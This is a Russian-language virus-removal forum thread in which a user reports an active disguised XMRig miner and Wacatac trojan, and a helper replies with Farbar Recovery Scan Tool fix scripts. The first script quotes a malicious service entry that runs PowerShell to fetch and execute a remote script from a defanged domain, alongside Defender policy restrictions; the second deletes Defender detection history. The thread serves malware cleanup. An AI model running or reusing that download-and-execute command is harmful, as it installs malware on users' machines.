Перейти к содержанию
Правила раздела

Trojan:Win64/DisguisedXMRigMiner ,Trojan:Win32/Wacatac.A!m

ewixis

Автор ewixis
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

ewixis

ewixis

Опубликовано
Опубликовано (изменено)

Защитник виндовс понятное дело удалять отказывается, действие "удалить" ничего не происходит

Обнаружено: Trojan:Win64/DisguisedXMRigMiner

Состояние: Активно

Обнаружено: Trojan:Win32/Wacatac.A!m

Состояние: Активно

 

Касперский и докторвеб - ничего не находят
 Farbar Recovery Scan Tool
показал следущее

Addition.txt FRST.txt

Изменено пользователем ewixis
  • ewixis изменил название на Trojan:Win64/DisguisedXMRigMiner ,Trojan:Win32/Wacatac.A!m
thyrex

thyrex

Опубликовано
Опубликовано

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать) 

Start::
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-1221974024-4211864995-550959383-1001\...\Run: [AMDNoiseSuppression] => "C:\Windows\system32\AMD\ANR\AMDNoiseSuppression.exe" (Нет файла)
GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Google: Ограничение <==== ВНИМАНИЕ
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 MicrosoftConsole; cmd.exe /c powershell.exe irm \"$(irm hxxps://uggsboots.ca/domain)/script?id=MzC5mRi0yY&tag=HWIDSpoofer\" ^| iex [X] <==== ВНИМАНИЕ
File: C:\ProgramData\RuntimeBroker.exe
File: C:\ProgramData\fontdrvhost.exe
FirewallRules: [TCP Query User{2D4AF635-8E99-4B99-B13E-52DF22106299}C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe] => (Allow) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [UDP Query User{5A86FE62-BC0C-424C-B4D4-2B34520C0D83}C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe] => (Allow) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [{F5DA0C92-AF5B-4043-A03E-475253806968}] => (Block) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [{62A1EF4B-1479-4DB8-AD83-50DC7F2BF843}] => (Block) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [{B003717D-8F91-4BBA-952B-FA55A304FEA1}] => (Block) C:\Program Files\BorisFX\ContinuumAE\13\utilities\bfx-version-update\bfx-version-update.exe => Нет файла
FirewallRules: [{858B83CD-9DD2-45F8-8E08-5638F7C78090}] => (Block) C:\Program Files\BorisFX\Sapphire 2024 Adobe\update-check\update-check.exe => Нет файла
FirewallRules: [{46670F30-615C-49C3-B504-8E9A944AB6D2}] => (Block) C:\Program Files\BorisFX\Sapphire 2024 Adobe\update-check\update-check.exe => Нет файла
FirewallRules: [{AC143033-55F5-4302-BFDB-EDC9D82B15F9}] => (Allow) C:\Program Files\Red Giant\Services\Red Giant Service.exe => Нет файла
FirewallRules: [{589AB3E0-0316-4B13-869A-227AB8866435}] => (Allow) C:\Program Files\Maxon\Tools\mxredirect.exe => Нет файла
AlternateDataStreams: C:\ProgramData:2c21b77e [1262]
AlternateDataStreams: C:\ProgramData:DNS [40]
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\Users\All Users:2c21b77e [1262]
AlternateDataStreams: C:\Users\All Users:DNS [40]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\Все пользователи:2c21b77e [1262]
AlternateDataStreams: C:\Users\Все пользователи:DNS [40]
AlternateDataStreams: C:\Users\Все пользователи:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:2c21b77e [1262]
AlternateDataStreams: C:\ProgramData\Application Data:DNS [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`bfjhioihinfh [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`bfjhjiiiio [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`bfjhjkiihj [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`vovtfe.qpsu.obnfjhjkiihj [0]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Health Check.lnk:F20EF51E1F [3442]
AlternateDataStreams: C:\Users\Public\desktop.ini:WinDeviceId [64]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [8202]
AlternateDataStreams: C:\Users\UserNC\Application Data:2c21b77e [1262]
AlternateDataStreams: C:\Users\UserNC\Application Data:DNS [40]
AlternateDataStreams: C:\Users\UserNC\Application Data:NT [40]
AlternateDataStreams: C:\Users\UserNC\Downloads\jjsploit_8.14.3_x64_en-US.msi:MBAM.Zone.Identifier [180]
AlternateDataStreams: C:\Users\UserNC\AppData\Roaming:2c21b77e [1262]
AlternateDataStreams: C:\Users\UserNC\AppData\Roaming:DNS [40]
AlternateDataStreams: C:\Users\UserNC\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\UserNC\Documents\GTA San Andreas User Files:2c21b77e [1262]
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.

thyrex

thyrex

Опубликовано
Опубликовано
2 часа назад, ewixis сказал:

Защитник виндовс понятное дело удалять отказывается, действие "удалить" ничего не происходит

Обнаружено: Trojan:Win64/DisguisedXMRigMiner

Состояние: Активно

Обнаружено: Trojan:Win32/Wacatac.A!m

Состояние: Активно

Защитник справился сам, файлов на компьютере нет.


1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать) 

Start::
CreateRestorePoint:
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\*.*"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\Detections.log"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\results\quick\*.*"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\results\resource\*.*"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\results\system\*.*"
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.


 

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • AlexTi22
      Trojan.Siggen31.46344 в Temp, app.dll
      Автор AlexTi22
      При проверке Dr. Web CureIt! было замечено 2 угрозы Trojan.Siggen31.46344 в одной из папок Temp в файле app.dll. Удаление при помощи CureIt не помогла, при перезагрузке проблема возвращается. Папки с этими файлами невозможно удалить вручную. 

    • Raritetious
      drweb.cureit нашел, но не может удалить вирус NET:MINERS.URL
      Автор Raritetious
      Здравствуйте! Помогите и мне пожалуйста, так же drweb.cure it нашел но не может удалить вирус NET:MINERS.URL, вот его лог. Так же прикрепил логи из FRST64
       
      cureit.log logs.zip
       
      Сообщение от модератора Mark D. Pearlstone Перемещено из темы.
    • LaVVINa
      Подселился Trojan.Packed2.49814. Восстанавливается сам, не смогла удалить
      Автор LaVVINa
      Добрый день! 
      Либо через расширения для хрома, либо через игры с торрента занесла вирус. Неймингуется Trojan.Packed2.49814
      Через безопасный режим виндовс не убирается, возвращается.
      Помогите, пожалуйста, убрать его 🙏
      CollectionLog-2025.09.19-21.18.zip
    • booblick
      [РЕШЕНО] Не работает Центр обновления Windows, некоторые службы получили приставку _bkp, MEM:Trojan.Win32.SEPEH.gen
      Автор booblick
      После замены жесткого диска лазил по параметрам и заметил что в Центре обновления Windows пусто. Решил зайти в службы и заметил что у Центра обновления Windows и других служб появилась приставка _bkp.
       
      Скачал Kaspersky Virus Removal Tool и проверил ноутбук. В итоге он нашел 3 вредные программки среди которых был MEM:Trojan.Win32.SEPEH.gen, но вроде антивирус удалил его и после перезагрузки проведя повторную проверку этот троян не был обнаружен.
      CollectionLog-2025.09.14-21.03.zip
    • r4pdj
      [РЕШЕНО] Обнаружено вредоносное приложение HEUR:Trojan.Win64.Miner.gen
      Автор r4pdj
      Здравствуйте.
      Неделю назад поставили Kaspersky Plus по подписке на второй компьютер (до этого несколько месяцев компьютер был без защиты). Обнаружилось 2 вируса. Один внедрён в svhost, другой - отдельное приложение майнер. Пробовали лечить, удалять и всё безрезультатно.

×
×
  • Создать...